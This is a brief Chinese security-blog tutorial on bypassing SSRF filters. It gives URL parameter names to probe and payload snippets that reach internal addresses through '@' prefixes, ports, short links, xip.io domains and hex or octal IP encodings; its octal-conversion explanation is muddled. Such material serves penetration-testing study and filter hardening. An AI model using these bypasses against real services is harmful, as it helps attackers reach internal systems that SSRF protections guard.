SSRF中的绕过姿势-华盟网

SSRF中的绕过姿势

华盟学院山东省第二期线下学习计划

从以下URL关键字中寻找SSRF漏洞:

[sourcecode language="plain"]
share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain
...
[/sourcecode]

http://127.0.0.1/ 被过滤的时候,可以尝试一下几种方式:
1、@

[sourcecode language="plain"]http://abc@127.0.0.1[/sourcecode]

2、添加端口号

[sourcecode language="plain"]http://127.0.0.1:8080[/sourcecode]

3、短地址

[sourcecode language="plain"]http://dwz.cn/11SMa[/sourcecode]

4、可以指向任意ip的域名:xip.io

[sourcecode language="plain"]
10.0.0.1.xip.io 10.0.0.1
www.10.0.0.1.xip.io 10.0.0.1
mysite.10.0.0.1.xip.io 10.0.0.1
foo.bar.10.0.0.1.xip.io 10.0.0.1
[/sourcecode]

5、ip地址转换成进制来访问

[sourcecode language="plain"]115.239.210.26 = 16373751032[/sourcecode]

首先把这四段数字给 转成 16 进制!结果:73 ef d2 1a 然后把 73efd21a 这十六进制一起转换成8进制!访问使用http://00+转换后十六进制

[sourcecode language="plain"]115.239.210.26 = 0x73.0xef.0xd2.0x1a[/sourcecode]

八进制

[sourcecode language="plain"]115.239.210.26 = 0163.0357.0322.0032[/sourcecode]

 

文章出处:Evi1cg's blog

www.idc126.com

原文链接:https://evi1cg.me/archives/SSRF_Bypass.html

本文由 华盟网 作者:AlexFrankly 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论